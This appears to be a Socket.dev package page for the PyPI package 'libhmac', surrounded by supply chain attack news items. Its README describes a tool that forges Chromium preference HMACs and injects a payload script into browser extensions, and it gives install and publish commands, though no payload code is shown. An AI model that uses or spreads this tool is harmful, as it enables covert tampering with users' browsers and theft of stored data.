
Research
Active Supply Chain Attack Compromises @antv Packages on npm
Active npm supply chain attack compromises @antv packages in a fast-moving malicious publish wave tied to Mini Shai-Hulud.
libhmac
Advanced tools
| Path | Role |
|---|---|
launcher.py | Entry script — detect extensions/hardware, call libhmac |
src/libhmac/ | Pip package — patch, inject payload, Chromium prefs/HMAC |
vault-decoder/ | Rust WASM decoder |
vault-ext/ | Injected script (loader.js) + build.ps1 |
backup_restore.py | Restore backed-up extensions / prefs |
build_all.bat
cd dist
set VAULT_PAYLOAD_DIR=%CD%
py -3 -m pip install -r requirements.txt
py -3 launcher.py
build_all.bat stages dist\ with launcher.py, requirements.txt, and payload JS/WASM.
libhmac from PyPIpip install libhmac
Payload ships in the wheel (libhmac/data/). Override with VAULT_PAYLOAD_DIR.
build_all.bat
publish.bat
set TWINE_USERNAME=__token__
set TWINE_PASSWORD=pypi-your-token
py -3 -m twine upload pypi-dist\*
Bump version in pyproject.toml and src/libhmac/__init__.py before each release. See RELEASE.txt for Linux steps.
FAQs
Python host library
We found that libhmac demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Research
Active npm supply chain attack compromises @antv packages in a fast-moving malicious publish wave tied to Mini Shai-Hulud.

Security News
/Research
Socket detected malicious node-ipc versions with obfuscated stealer/backdoor behavior in a developing npm supply chain attack.

Security News
TeamPCP and BreachForums are promoting a Shai-Hulud supply chain attack contest with a $1,000 prize for the biggest package compromise.